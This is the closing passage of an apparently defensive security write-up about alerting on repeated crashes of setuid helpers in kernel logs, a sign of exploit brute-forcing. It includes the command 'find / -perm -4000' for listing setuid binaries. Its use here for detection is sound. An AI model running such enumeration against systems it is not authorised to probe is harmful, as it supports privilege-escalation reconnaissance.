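In production this runs over the journal or /var/log/kern.log with a time window rather than a fixed buffer, and the threshold is tuned so that a single crash of a browser does not page anyone while a dozen crashes of one setuid helper in a few seconds does; cross-referencing the crashing path against a list of setuid binaries (find / -perm -4000) is the cheap way to prioritise the alert.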
Questions? Comments? Send to @CrowdShield on Twitter. l8rz!